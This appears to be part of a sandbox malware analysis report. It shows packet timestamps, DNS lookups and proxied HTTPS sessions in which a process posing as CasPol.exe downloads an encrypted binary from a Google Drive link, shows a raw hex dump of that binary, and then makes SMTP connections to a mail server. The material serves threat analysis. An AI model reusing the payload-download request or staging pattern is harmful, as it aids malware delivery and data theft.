                                                                                                                                  May 12, 2022 19:41:27.305804968 CEST49782443192.168.11.20142.250.185.161
                                                                                                                                  May 12, 2022 19:41:27.305852890 CEST49782443192.168.11.20142.250.185.161
                                                                                                                                  May 12, 2022 19:41:27.305986881 CEST44349782142.250.185.161192.168.11.20
                                                                                                                                  May 12, 2022 19:41:27.306031942 CEST49782443192.168.11.20142.250.185.161
                                                                                                                                  May 12, 2022 19:41:27.306046963 CEST49782443192.168.11.20142.250.185.161
                                                                                                                                  May 12, 2022 19:41:27.306062937 CEST44349782142.250.185.161192.168.11.20
                                                                                                                                  May 12, 2022 19:41:27.306224108 CEST49782443192.168.11.20142.250.185.161
                                                                                                                                  May 12, 2022 19:41:27.306236029 CEST49782443192.168.11.20142.250.185.161
                                                                                                                                  May 12, 2022 19:41:27.306246042 CEST44349782142.250.185.161192.168.11.20
                                                                                                                                  May 12, 2022 19:41:27.306265116 CEST44349782142.250.185.161192.168.11.20
                                                                                                                                  May 12, 2022 19:41:27.306437016 CEST44349782142.250.185.161192.168.11.20
                                                                                                                                  May 12, 2022 19:41:27.306591034 CEST49782443192.168.11.20142.250.185.161
                                                                                                                                  May 12, 2022 19:41:27.306627035 CEST44349782142.250.185.161192.168.11.20
                                                                                                                                  May 12, 2022 19:41:27.306783915 CEST44349782142.250.185.161192.168.11.20
                                                                                                                                  May 12, 2022 19:41:27.306843996 CEST49782443192.168.11.20142.250.185.161
                                                                                                                                  May 12, 2022 19:41:27.306862116 CEST49782443192.168.11.20142.250.185.161
                                                                                                                                  May 12, 2022 19:41:27.306878090 CEST44349782142.250.185.161192.168.11.20
                                                                                                                                  May 12, 2022 19:41:27.307010889 CEST49782443192.168.11.20142.250.185.161
                                                                                                                                  May 12, 2022 19:41:27.307029009 CEST44349782142.250.185.161192.168.11.20
                                                                                                                                  May 12, 2022 19:41:27.307090998 CEST49782443192.168.11.20142.250.185.161
                                                                                                                                  May 12, 2022 19:41:27.307112932 CEST44349782142.250.185.161192.168.11.20
                                                                                                                                  May 12, 2022 19:41:27.307250977 CEST49782443192.168.11.20142.250.185.161
                                                                                                                                  May 12, 2022 19:41:27.307266951 CEST49782443192.168.11.20142.250.185.161
                                                                                                                                  May 12, 2022 19:41:27.307282925 CEST44349782142.250.185.161192.168.11.20
                                                                                                                                  May 12, 2022 19:41:27.307305098 CEST44349782142.250.185.161192.168.11.20
                                                                                                                                  May 12, 2022 19:41:27.307531118 CEST44349782142.250.185.161192.168.11.20
                                                                                                                                  May 12, 2022 19:41:27.307881117 CEST44349782142.250.185.161192.168.11.20
                                                                                                                                  May 12, 2022 19:41:27.308023930 CEST49782443192.168.11.20142.250.185.161
                                                                                                                                  May 12, 2022 19:41:27.308053970 CEST44349782142.250.185.161192.168.11.20
                                                                                                                                  May 12, 2022 19:41:27.308073997 CEST49782443192.168.11.20142.250.185.161
                                                                                                                                  May 12, 2022 19:41:27.308084011 CEST49782443192.168.11.20142.250.185.161
                                                                                                                                  May 12, 2022 19:41:27.308182001 CEST49782443192.168.11.20142.250.185.161
                                                                                                                                  May 12, 2022 19:41:27.308310986 CEST44349782142.250.185.161192.168.11.20
                                                                                                                                  May 12, 2022 19:41:27.308372021 CEST49782443192.168.11.20142.250.185.161
                                                                                                                                  May 12, 2022 19:41:27.308393955 CEST49782443192.168.11.20142.250.185.161
                                                                                                                                  May 12, 2022 19:41:27.308402061 CEST49782443192.168.11.20142.250.185.161
                                                                                                                                  May 12, 2022 19:41:27.308567047 CEST49782443192.168.11.20142.250.185.161
                                                                                                                                  May 12, 2022 19:41:27.308602095 CEST49782443192.168.11.20142.250.185.161
                                                                                                                                  May 12, 2022 19:41:27.308633089 CEST44349782142.250.185.161192.168.11.20
                                                                                                                                  May 12, 2022 19:41:35.442523956 CEST49783587192.168.11.2081.25.126.48
                                                                                                                                  May 12, 2022 19:41:35.484591007 CEST5874978381.25.126.48192.168.11.20
                                                                                                                                  May 12, 2022 19:41:35.484775066 CEST49783587192.168.11.2081.25.126.48
                                                                                                                                  May 12, 2022 19:41:35.648189068 CEST5874978381.25.126.48192.168.11.20
                                                                                                                                  May 12, 2022 19:41:35.648559093 CEST49783587192.168.11.2081.25.126.48
                                                                                                                                  May 12, 2022 19:41:35.689850092 CEST5874978381.25.126.48192.168.11.20
                                                                                                                                  May 12, 2022 19:41:35.690192938 CEST5874978381.25.126.48192.168.11.20
                                                                                                                                  May 12, 2022 19:41:35.690509081 CEST49783587192.168.11.2081.25.126.48
                                                                                                                                  May 12, 2022 19:41:35.732141018 CEST5874978381.25.126.48192.168.11.20
                                                                                                                                  May 12, 2022 19:41:35.737832069 CEST49783587192.168.11.2081.25.126.48
                                                                                                                                  May 12, 2022 19:41:35.780376911 CEST5874978381.25.126.48192.168.11.20
                                                                                                                                  May 12, 2022 19:41:35.780416965 CEST5874978381.25.126.48192.168.11.20
                                                                                                                                  May 12, 2022 19:41:35.780447960 CEST5874978381.25.126.48192.168.11.20
                                                                                                                                  May 12, 2022 19:41:35.780469894 CEST5874978381.25.126.48192.168.11.20
                                                                                                                                  May 12, 2022 19:41:35.780538082 CEST49783587192.168.11.2081.25.126.48
                                                                                                                                  May 12, 2022 19:41:35.780735970 CEST49783587192.168.11.2081.25.126.48
                                                                                                                                  May 12, 2022 19:41:35.821988106 CEST5874978381.25.126.48192.168.11.20
                                                                                                                                  May 12, 2022 19:41:35.825941086 CEST49783587192.168.11.2081.25.126.48
                                                                                                                                  May 12, 2022 19:41:35.868412971 CEST5874978381.25.126.48192.168.11.20
                                                                                                                                  May 12, 2022 19:41:35.921494007 CEST49783587192.168.11.2081.25.126.48
                                                                                                                                  May 12, 2022 19:41:36.465266943 CEST49783587192.168.11.2081.25.126.48
                                                                                                                                  May 12, 2022 19:41:36.506926060 CEST5874978381.25.126.48192.168.11.20
                                                                                                                                  May 12, 2022 19:41:36.507386923 CEST49783587192.168.11.2081.25.126.48
                                                                                                                                  May 12, 2022 19:41:36.549242020 CEST5874978381.25.126.48192.168.11.20
                                                                                                                                  May 12, 2022 19:41:36.549724102 CEST49783587192.168.11.2081.25.126.48
                                                                                                                                  May 12, 2022 19:41:36.596405029 CEST5874978381.25.126.48192.168.11.20
                                                                                                                                  May 12, 2022 19:41:36.596822023 CEST49783587192.168.11.2081.25.126.48
                                                                                                                                  May 12, 2022 19:41:36.643965006 CEST5874978381.25.126.48192.168.11.20
                                                                                                                                  May 12, 2022 19:41:36.644548893 CEST49783587192.168.11.2081.25.126.48
                                                                                                                                  May 12, 2022 19:41:36.718919039 CEST5874978381.25.126.48192.168.11.20
                                                                                                                                  May 12, 2022 19:41:36.765069008 CEST49783587192.168.11.2081.25.126.48
                                                                                                                                  May 12, 2022 19:41:38.471632957 CEST49786587192.168.11.2081.25.126.48
                                                                                                                                  May 12, 2022 19:41:38.545838118 CEST5874978681.25.126.48192.168.11.20
                                                                                                                                  May 12, 2022 19:41:38.546006918 CEST49786587192.168.11.2081.25.126.48
                                                                                                                                  May 12, 2022 19:41:38.619878054 CEST5874978681.25.126.48192.168.11.20
                                                                                                                                  May 12, 2022 19:41:38.620347977 CEST49786587192.168.11.2081.25.126.48
                                                                                                                                  May 12, 2022 19:41:38.661957026 CEST5874978681.25.126.48192.168.11.20
                                                                                                                                  May 12, 2022 19:41:38.662025928 CEST5874978681.25.126.48192.168.11.20
                                                                                                                                  May 12, 2022 19:41:38.662394047 CEST49786587192.168.11.2081.25.126.48
                                                                                                                                  May 12, 2022 19:41:38.704106092 CEST5874978681.25.126.48192.168.11.20
                                                                                                                                  May 12, 2022 19:41:38.704637051 CEST49786587192.168.11.2081.25.126.48
                                                                                                                                  May 12, 2022 19:41:38.747307062 CEST5874978681.25.126.48192.168.11.20
                                                                                                                                  May 12, 2022 19:41:38.748182058 CEST49786587192.168.11.2081.25.126.48
                                                                                                                                  May 12, 2022 19:41:38.803093910 CEST49786587192.168.11.2081.25.126.48
                                                                                                                                  May 12, 2022 19:41:38.832418919 CEST5874978681.25.126.48192.168.11.20
                                                                                                                                  May 12, 2022 19:41:38.844518900 CEST5874978681.25.126.48192.168.11.20
                                                                                                                                  May 12, 2022 19:41:38.844811916 CEST5874978681.25.126.48192.168.11.20
                                                                                                                                  May 12, 2022 19:41:38.845207930 CEST49786587192.168.11.2081.25.126.48
                                                                                                                                  May 12, 2022 19:41:38.887023926 CEST5874978681.25.126.48192.168.11.20
                                                                                                                                  May 12, 2022 19:41:38.887407064 CEST49786587192.168.11.2081.25.126.48
                                                                                                                                  May 12, 2022 19:41:38.931960106 CEST5874978681.25.126.48192.168.11.20
                                                                                                                                  May 12, 2022 19:41:38.932424068 CEST49786587192.168.11.2081.25.126.48
                                                                                                                                  May 12, 2022 19:41:38.976465940 CEST5874978681.25.126.48192.168.11.20
                                                                                                                                  May 12, 2022 19:41:38.976900101 CEST49786587192.168.11.2081.25.126.48
                                                                                                                                  May 12, 2022 19:41:38.984436989 CEST49786587192.168.11.2081.25.126.48
                                                                                                                                  May 12, 2022 19:41:39.026539087 CEST5874978681.25.126.48192.168.11.20
                                                                                                                                  May 12, 2022 19:41:39.026669979 CEST49786587192.168.11.2081.25.126.48
                                                                                                                                  May 12, 2022 19:41:39.027595043 CEST5874978681.25.126.48192.168.11.20
                                                                                                                                  May 12, 2022 19:41:39.027723074 CEST49786587192.168.11.2081.25.126.48
                                                                                                                                  May 12, 2022 19:46:36.809247971 CEST5874978381.25.126.48192.168.11.20
                                                                                                                                  May 12, 2022 19:46:36.809329987 CEST5874978381.25.126.48192.168.11.20
                                                                                                                                  May 12, 2022 19:46:36.809461117 CEST49783587192.168.11.2081.25.126.48

                                                                                                                                  UDP Packets

                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  May 12, 2022 19:41:26.083143950 CEST5642553192.168.11.201.1.1.1
                                                                                                                                  May 12, 2022 19:41:26.091399908 CEST53564251.1.1.1192.168.11.20
                                                                                                                                  May 12, 2022 19:41:26.940180063 CEST5644953192.168.11.201.1.1.1
                                                                                                                                  May 12, 2022 19:41:26.986876965 CEST53564491.1.1.1192.168.11.20
                                                                                                                                  May 12, 2022 19:41:34.960331917 CEST5110553192.168.11.201.1.1.1
                                                                                                                                  May 12, 2022 19:41:35.382215023 CEST53511051.1.1.1192.168.11.20

                                                                                                                                  DNS Queries

                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                  May 12, 2022 19:41:26.083143950 CEST192.168.11.201.1.1.10x5db0Standard query (0)drive.google.comA (IP address)IN (0x0001)
                                                                                                                                  May 12, 2022 19:41:26.940180063 CEST192.168.11.201.1.1.10x2ce1Standard query (0)doc-10-20-docs.googleusercontent.comA (IP address)IN (0x0001)
                                                                                                                                  May 12, 2022 19:41:34.960331917 CEST192.168.11.201.1.1.10x982eStandard query (0)mail.cpassociats.comA (IP address)IN (0x0001)

                                                                                                                                  DNS Answers

                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                  May 12, 2022 19:41:26.091399908 CEST1.1.1.1192.168.11.200x5db0No error (0)drive.google.com142.250.184.206A (IP address)IN (0x0001)
                                                                                                                                  May 12, 2022 19:41:26.986876965 CEST1.1.1.1192.168.11.200x2ce1No error (0)doc-10-20-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                  May 12, 2022 19:41:26.986876965 CEST1.1.1.1192.168.11.200x2ce1No error (0)googlehosted.l.googleusercontent.com142.250.185.161A (IP address)IN (0x0001)
                                                                                                                                  May 12, 2022 19:41:35.382215023 CEST1.1.1.1192.168.11.200x982eNo error (0)mail.cpassociats.comCE2020050617001.dnssw.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                  May 12, 2022 19:41:35.382215023 CEST1.1.1.1192.168.11.200x982eNo error (0)CE2020050617001.dnssw.net81.25.126.48A (IP address)IN (0x0001)

                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                  • drive.google.com
                                                                                                                                  • doc-10-20-docs.googleusercontent.com

                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  0192.168.11.2049781142.250.184.206443C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-05-12 17:41:26 UTC0OUTGET /uc?export=download&id=1octpIAVRhdcovKdwE5x43Ys6qBKX9XGT HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Host: drive.google.com
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  2022-05-12 17:41:26 UTC0INHTTP/1.1 303 See Other
                                                                                                                                  Content-Type: application/binary
                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                  Pragma: no-cache
                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                  Date: Thu, 12 May 2022 17:41:26 GMT
                                                                                                                                  Location: https://doc-10-20-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/mltfd60qk512l24argm1l66nhg5fuhtt/1652377275000/13609515036127870368/*/1octpIAVRhdcovKdwE5x43Ys6qBKX9XGT?e=download
                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                  Content-Security-Policy: script-src 'nonce-JkkGMaugVQ2L9GIC3TDbmg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                  Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                  Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                  Server: ESF
                                                                                                                                  Content-Length: 0
                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                  Connection: close


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  1192.168.11.2049782142.250.185.161443C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-05-12 17:41:27 UTC1OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/mltfd60qk512l24argm1l66nhg5fuhtt/1652377275000/13609515036127870368/*/1octpIAVRhdcovKdwE5x43Ys6qBKX9XGT?e=download HTTP/1.1
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Host: doc-10-20-docs.googleusercontent.com
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2022-05-12 17:41:27 UTC2INHTTP/1.1 200 OK
                                                                                                                                  X-GUploader-UploadID: ADPycdu-mvraOBzuXH47HSc0RSXArhtSvdcHh5gw3Q6-2_iBGqHCiqlxq6a9G4ziMZwyMGVmDQvUilp1xma_zE-4zugdnQ
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Credentials: false
                                                                                                                                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment
                                                                                                                                  Access-Control-Allow-Methods: GET,OPTIONS
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  Content-Disposition: attachment;filename="doggynew_LNQML90.bin";filename*=UTF-8''doggynew_LNQML90.bin
                                                                                                                                  Content-Length: 214080
                                                                                                                                  Date: Thu, 12 May 2022 17:41:27 GMT
                                                                                                                                  Expires: Thu, 12 May 2022 17:41:27 GMT
                                                                                                                                  Cache-Control: private, max-age=0
                                                                                                                                  X-Goog-Hash: crc32c=VNuVlQ==
                                                                                                                                  Server: UploadServer
                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                  Connection: close
                                                                                                                                  2022-05-12 17:41:27 UTC5INData Raw: f7 a8 36 17 ac 5c 80 82 b8 f1 56 5d 40 70 57 cf 73 be f6 a7 81 07 11 af f1 1d ba 19 6b 3a bf 59 4a c6 7a 5c bf 7b ee 63 81 86 6e 23 4e 92 14 0b 1b 3b 13 af f7 1b 49 f3 36 10 71 94 70 d2 2d 62 9c ca 90 db 15 b6 c7 37 02 69 66 32 e7 28 49 0a 2b 6c f5 32 3c 96 7d a8 97 30 7a 7b 76 e9 c7 35 f1 0a 28 0b 7d f1 c1 bc 59 70 23 e3 54 68 47 95 ea cb c9 3a 52 26 2f b9 de 4a a5 57 0a 01 24 65 10 4f a9 76 16 74 e0 55 6d d2 44 a9 23 86 1e 4e ea de 94 57 ad e0 05 90 1b 9a 34 8d c8 c9 ab b7 90 b0 16 24 c8 23 72 e2 fc 3b 2d ab 20 b2 31 0d 4b 78 4d 39 83 8d 4b ed fd cc b9 81 2c 04 bc 55 62 ca 60 6e f2 d3 55 cc 6e b9 2a c2 8a f7 c7 3e fe 33 a7 b4 f8 48 0d 6e 44 11 ae 66 92 6c 2b 72 1a 34 25 56 4b 2d 77 92 04 52 27 1f 0c f4 7f 38 e1 1e be e1 2b 7f 94 3d 71 a5 b1 f1 ea ad 34
                                                                                                                                  Data Ascii: 6\V]@pWsk:YJz\{cn#N;I6qp-b7if2(I+l2<}0z{v5(}Yp#ThG:R&/JW$eOvtUmD#NW4$#r;- 1KxM9K,Ub`nUn*>3HnDfl+r4%VK-wR'8+=q4
                                                                                                                                  2022-05-12 17:41:27 UTC9INData Raw: d2 da 81 f6 49 f0 0b f7 45 54 49 44 91 0d 2b cd aa a8 87 d2 aa e0 8a 17 44 31 02 10 ee 3c 94 2e 6d ab 20 55 0c 82 87 39 8d e2 38 61 5c 0b bb 3c aa be e4 6e 29 e9 3d 12 37 68 c0 03 cd 2f 3c 55 e7 2e 0b 1f be a6 e1 a5 c5 ee 79 5a 15 25 45 b4 08 5d fd bd 65 75 c1 3d a3 01 4d 63 49 c6 f9 a3 55 29 2c d5 55 60 ea a3 b8 c0 8b b3 80 24 8a 49 e4 d4 ed 2a 9e fd 24 a2 a3 a9 10 47 00 4e 5d af 3c b3 c7 9f 78 9c cc 74 0b 17 dc 68 bc b1 28 bd 3e 63 b7 4d 42 8d 5d f5 a3 71 f8 b2 a9 db d4 64 b0 79 e3 91 6b 9a 20 c0 34 68 a5 37 2e 6c 86 b0 e3 f9 e6 e2 35 fd 45 51 93 90 2a 4d e6 ab af 77 d1 d9 ea 88 c4 ea 05 34 e5 3a b0 77 b9 9d 45 b5 77 e4 c6 4b 75 87 db 58 8d 4f df 7b fe 41 13 67 d4 27 46 ac cb ac a7 3a 7a be 0b 09 82 0e 34 46 f4 6b 98 47 fa 6b 48 05 db b2 f4 93 a6 49 cb
                                                                                                                                  Data Ascii: IETID+D1<.m U98a\<n)=7h/<U.yZ%E]eu=McIU),U`$I*$GN]<xth(>cMB]qdyk 4h7.l5EQ*Mw4:wEwKuXO{Ag'F:z4FkGkHI
                                                                                                                                  2022-05-12 17:41:27 UTC13INData Raw: 1b c1 15 55 99 96 ff 10 dc 2e ad d4 e9 c0 0e cb 73 21 48 71 6e 93 a4 5f 97 ba 84 13 ad 00 8d 26 3f f3 ec e6 69 3c f2 98 c0 d4 d6 0b 55 5b 05 ef f3 63 9d 39 0d f0 6c 0b 22 3f f7 7a eb 89 fb f2 be 8d 39 2e b5 41 fc fe 3c 04 a7 62 57 bd 30 78 dc 1a 30 d7 23 f0 33 b8 f1 68 be 43 c5 fd 38 2e 13 6e 62 6b 4f 13 06 74 fb ec 9b 1e 12 de 8e fc e4 f8 5e 7d 18 ae 49 a2 73 d6 ce 1e 63 05 4b 48 b8 22 1a e5 8c 21 34 2e df 35 bc 02 80 58 a2 df c0 61 16 7e e0 5a ed f3 83 e8 6e 6e c6 26 89 ad d4 1e 6c 3d 31 9e fd 5a db 78 cd ba e0 db 65 69 5b d5 97 10 2d 35 8e fa b6 c5 e8 10 4d c3 f5 5f 79 76 30 1f ef 77 09 0e 71 09 21 51 45 12 e0 29 a4 e3 98 46 3b e1 6c 0a 56 d2 76 16 0c 88 8b 98 8c 33 17 36 fb 24 19 bf eb 3c c8 0c 4e d0 74 7b a7 9f e2 28 aa 24 1f 25 32 82 97 9d c1 0a dc
                                                                                                                                  Data Ascii: U.s!Hqn_&?i<U[c9l"?z9.A<bW0x0#3hC8.nbkOt^}IscKH"!4.5Xa~Znn&l=1Zxei[-5M_yv0wq!QE)F;lVv36$<Nt{($%2
                                                                                                                                  2022-05-12 17:41:27 UTC16INData Raw: e3 cc 52 63 ee c9 69 82 ca e5 00 9e 5e a1 8e b9 ab 6b 7d b4 7a 42 04 20 6f fa 36 ee 2c 21 d7 87 8d dc 16 b6 c6 24 02 78 62 24 1b 75 58 0e 87 78 e3 25 14 0b 7d a8 dd 37 6e 53 b3 eb c7 33 e7 87 2f 0b 7d f0 d5 a8 4d 58 bb e3 54 62 53 bd 23 c9 c9 3c 45 ab 28 b9 de 4b b6 53 9b 05 32 73 92 02 13 78 17 62 f8 9c 58 7e 53 f2 c6 3a 4a 26 89 aa a0 0f 1a 8d 62 e4 6c 7a 13 ee a9 a6 d1 cc f0 b8 ec 41 e8 5b 13 a4 16 50 43 8d 73 70 65 2d 26 16 3a 58 bc 84 50 f0 55 9e b9 81 2d a6 ad 51 26 9b 76 79 96 4f 56 cc 46 f0 46 88 4f f5 c7 38 e8 be a0 b4 18 49 1b 7b 5b 38 3e 66 92 5a 3c 5a d1 30 25 50 5c a0 70 92 7a 09 37 1b 1d d0 69 2f 6d 4c be e1 2a dd c5 39 65 91 a7 e6 c2 32 34 9a ec c2 c1 5a 12 9d cb aa a9 0b 25 e2 7f 20 cb ac f9 c2 7a 92 c8 58 75 1a 79 a1 4b 3f 5f 18 b2 83 e0
                                                                                                                                  Data Ascii: Rci^k}zB o6,!$xb$uXx%}7nS3/}MXTbS#<E(KS2sxbX~S:J&blzA[PCspe-&:XPU-Q&vyOVFFO8I{[8>fZ<Z0%P\pz7i/mL*9e24Z% zXuyK?_
                                                                                                                                  2022-05-12 17:41:27 UTC18INData Raw: 7b 64 1a 20 03 7d a7 e9 8f fb cd 10 8a 39 24 db 23 ee ef 24 03 87 94 df bf 36 dc a2 78 24 c3 3d c9 a3 af 9e 09 96 52 cf ec 3a 15 76 78 71 6a 31 75 12 5c 2d ff 93 77 79 53 89 f6 f7 ff 65 cc 0b bc 59 86 a3 d1 a1 bc c1 14 53 30 35 d8 1b ef 99 97 0e 75 da 35 c7 8c 18 58 a8 fd 4f c6 16 74 f9 44 f7 dd 6b fe 69 ea 5d 54 ec a6 c5 10 55 3b 2c 9b eb 4f c6 1b 4d e5 e2 d1 4b e8 f5 d5 9d 09 0f ba df fa bc dc fc 0b 32 fe 5f 5f 73 6f 01 e4 17 99 fd c6 76 13 bf 93 13 66 e0 28 82 fe 9d 39 e4 d8 6c 00 7a 13 f5 00 1d 96 22 d2 68 33 16 10 e4 38 25 30 d3 3c ce 00 30 80 7c 6a a8 6b d0 2e ad 38 77 43 85 ed e9 90 1f 0c e5 a4 37 10 12 df b3 f4 ba 49 fa dd ce 32 40 3a a5 b9 43 21 de a8 91 f2 d9 c5 0f a2 3c 4e 5e ee 38 9a 34 87 3b 6e f8 31 46 65 22 af 78 87 96 49 49 0d 0a a8 38 93
                                                                                                                                  Data Ascii: {d }9$#$6x$=R:vxqj1u\-wySeYS05u5XOtDki]TU;,OMK2__sovf(9lz"h38%0<0|jk.8wC7I2@:C!<N^84;n1Fe"xII8
                                                                                                                                  2022-05-12 17:41:27 UTC19INData Raw: 1f 38 49 84 8e 5d e3 c6 75 7a e9 dd 41 06 d4 e5 06 8a d3 a6 8e 00 aa 7f 69 a9 50 da 04 e2 67 ee 1e 37 2e 21 d1 90 00 db 16 a5 f7 34 06 29 66 32 18 df 49 0a 82 7a fe 19 27 96 7a bf 29 31 56 79 6e e2 c7 32 e7 f4 29 27 7f e6 ca bc 5e 68 dd e2 78 6a 6c 97 c1 28 ca 2c 51 a8 98 91 24 4a a5 5d a2 48 26 65 18 2e 21 78 16 ca 86 d2 4c 6a 4f 8a 3d a7 4a 2c a9 db c7 6e df 8f 64 ca 3a f7 14 e8 bd 27 f5 d8 e4 94 60 c1 d9 51 07 88 c8 d2 71 8b 64 f9 48 2d 26 04 19 5e ad a7 46 e7 d9 e6 b9 81 3d 12 b7 7e 29 8f 67 79 40 d3 7a ce 54 fc 52 a7 9c 09 c6 12 fc 24 ac b4 1f 50 f1 6e 63 12 8d 64 b9 b3 56 5e 1a 32 21 7c 95 53 5b 92 7a 0c 08 0e 18 2a 79 7f e1 1e b8 92 7e 7f d4 3b 59 ca b1 f1 ec ad b4 b6 e6 c5 d1 0c f2 9f cb a8 93 97 36 1c 79 66 df b8 eb a6 07 0e c8 5e 57 72 52 fb 4a
                                                                                                                                  Data Ascii: 8I]uzAiPg7.!4)f2Iz'z)1Vyn2)'^hxjl(,Q$J]H&e.!xLjO=J,nd:'`QqdH-&^F=~)gy@zTR$PncdV^2!|S[z*y~;Y6yf^WrRJ
